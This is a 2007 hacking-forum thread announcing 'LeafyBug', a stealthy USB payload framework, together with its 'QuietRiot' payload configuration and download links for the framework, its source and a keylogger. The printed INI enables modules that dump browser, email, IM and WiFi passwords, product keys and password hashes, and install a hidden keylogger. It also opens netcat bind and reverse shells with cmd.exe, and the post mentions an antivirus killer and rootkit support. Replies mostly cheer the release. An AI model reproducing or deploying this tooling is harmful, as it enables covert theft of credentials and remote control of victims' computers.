twsSentinel Posted May 29, 2007 Share Posted May 29, 2007 The LeafyBug - A new advancement based off the SwitchBlabe PoC. Update: 6.09.2007 Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer, therefor, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload!. I has a few other features to assist in run customization. Anyway, to no further wait: http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# Source code for the framework http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET Keylogger I made which works x86 & x64. Does not use WinAPI Hooks. *More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there. Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :) What is the LeafyBug? All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug, is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework. ;*********************************************** * ;* QuietRiot v2.1.5 Modules ;* LeafyBug Payload ;* Date: 5/25/2007 ;* Code: _DmG_ ;*********************************************** */ ;* ******************************************************************************** *********************************** * ;* Creating Custom Modules: ;* ;* To create a module you must specify certain variables... ;* =-----------------------------------------------------------------------------------------------------------------= ;* | Var | Value | Required | ;* =-----------------------------------------------------------------------------------------------------------------= ;* Enabled = Enabled or Disabled (Write 'true' or 'false') YES ;* Filename = EXE_NAME("Name of actual exe's name")(Ex. keyLogger.exe, netstat) YES ;* Mode = (Choices either 1,2,3) YES ;* 1 = SystemInfo (Ex. netstat, ipconfig) Used for system executable's only ;* 2 = Executable (The exe will be run from usb device) ;* 3 = Executable (The exe will be copied to target. If RootKit is enabled, it will ;* run under its protection.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* FileDIR = Path to copy exe to if 'Mode'== 2 or 3 (Default. Leave empty) NO ;* PreArgs = Custom export args (This string will be sent after the EXE_NAME & NO ;* before the output filename) Nirsoft applications generally use '/stext' to ;* output into a log, but some apps require something different. See the ;* "Firefox Passwords" module for an example. ;* PostArgs = Custom export args NO ;* If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch". ;* If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger" ;* x64 = x64 Flag! (If you know an app is incompatible with x64 OS, than set to "true". NO ;* The app wont run.)(Default. Leave empty or false)(See "pwdump" module as an example.) ;* x64File = x64 Alternative EXE Support (If you have two executables one for x86, and x64, NO ;* you can set the EXE_NAME to the file here. ;* (See "CurrentPorts" & "WifiKeys" modules as examples.) ;* Output = If the application will output text, leave blank or set to true, otherwise, false. NO ;* (See "NetCat" or "Keylogger", these programs dont require the app to finish.) ;* =-----------------------------------------------------------------------------------------------------------------= ;* ******************************************************************************** *********************************** * ;PRE-CONFIGURED VARIABLES: Use these to aid in settings. ; ;$DRIVE_DIR$ » Drive the payload executes from. ;$MACHINE_NAME$ » Target computers name. ;$SYSTEM$ » Target computers system32 directory. ;$DATE$ » Date of execution. ;$TIME$ » Time of execution. ;$NC_PORT$ » Port number specified in config file. ;$NC_RVS_IP$ » Reverse shell IP. ;$NC_RVS_PORT$ » Reverse shell port. [Anti-Virus Killer] Enabled=false Filename= Mode= FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output=false [NetStat] Enabled=false Filename=netstat Mode=1 FileDir=$FILE_DIR$ PreArgs=-n PostArgs= x64= x64File= Output= [AdapterWatch] Enabled=true Filename=quietriot_awatch.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=/stab PostArgs=1 x64= x64File= Output= [CurrentPorts] Enabled=true Filename=quietriot_cports.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64=true x64File=quietriot_cports64.exe Output= [Firefox Passwords] Enabled=true Filename=quietriot_FirePassword.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=>> PostArgs= x64= x64File= Output= [Internet Explorer] Enabled=true Filename=quietriot_iepv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Internet Explorer History] Enabled=true Filename=quietriot_iehv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Product Keys] Enabled=true Filename=quietriot_ProduKey.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Instant Messenger] Enabled=true Filename=quietriot_mspass.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [E-Mail Accounts] Enabled=true Filename=quietriot_mailpv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Windows Updates] Enabled=true Filename=quietriot_wul.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [Protected Storage] Enabled=true Filename=quietriot_pspv.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File= Output= [WiFi Keys] Enabled=true Filename=quietriot_WirelessKeyView.exe Mode=2 FileDir=$FILE_DIR$ PreArgs= PostArgs= x64= x64File=quietriot_WirelessKeyView64.exe Output= [KeyLogger] Enabled=true Filename=quietriot_NetLogger.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-m hour PostArgs=MSKL x64= x64File= Output=false [PwDump] Enabled=true Filename=quietriot_pwdump.exe Mode=2 FileDir=$FILE_DIR$ PreArgs=>> PostArgs= x64=true x64File= Output= [NetCat BindShell] Enabled=true Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=-L -p $NC_PORT$ -d -e cmd.exe PostArgs=MSNCBS x64= x64File= Output=false [NetCat ReverseShell] Enabled=false Filename=quietriot_nc.exe Mode=3 FileDir=$FILE_DIR$ PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe PostArgs=MSNCRS x64= x64File= Output=false Oooohhh, Aaahhhhh ... What's so damn special about it?!? No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just few more quick features to add. Here's why to migrate to the LeafyBug: [li]Full WinOS Compatability and Customization - x86 & x64[/li] [li]100% hidden running ... other payloads would show up on x64[/li] [li]LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.[/li] [li]Auto-Detects system architecture, allows you to specify 32&64bit apps for each module, and automatically executes the proper one.[/li] [li]RootKit Ability[/li] [li]Easy to create, expand, simplify with no code what-so-ever. Add new modules with ease in the editor.[/li] [li]Customize each module down to a T how it will run and execute.[/li] [li]Installation is simple, place whatever you want in any drive/directory[/li] [li]U3 & Non-U3 Compliant[/li] Quote Link to comment Share on other sites More sharing options...
thespy Posted May 29, 2007 Share Posted May 29, 2007 dude, looks great can't wait for the release Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted May 30, 2007 Share Posted May 30, 2007 Looks badass, this will make life simple for newbs and the vets alike. thx man Quote Link to comment Share on other sites More sharing options...
lixo Posted June 5, 2007 Share Posted June 5, 2007 Sounds pretty good. Any date yet for a release? Quote Link to comment Share on other sites More sharing options...
W4RP3D Posted June 5, 2007 Share Posted June 5, 2007 Wow thats looks really descent, absolutely great idea. Whats the ETA? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted June 5, 2007 Share Posted June 5, 2007 Wiki it up man... And when can we book you as a guest on Hak5Live? Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted June 6, 2007 Author Share Posted June 6, 2007 Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!) sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a wk. I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see. On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs. Anyways ... thanks for the support guys. Sorry for the wait! Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted June 10, 2007 Author Share Posted June 10, 2007 LeafyBug has been released (Look up top at first post). Please read the update first though. Thanks guys for your support! Quote Link to comment Share on other sites More sharing options...
W4RP3D Posted June 10, 2007 Share Posted June 10, 2007 I might just be being stupid ive been up since 5am and worked an 11 hr day but im neading a username and password? Quote Link to comment Share on other sites More sharing options...
twsSentinel Posted June 10, 2007 Author Share Posted June 10, 2007 oh crap .. sry guys! ... I forgot to config IIS for those files. *fixed* Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.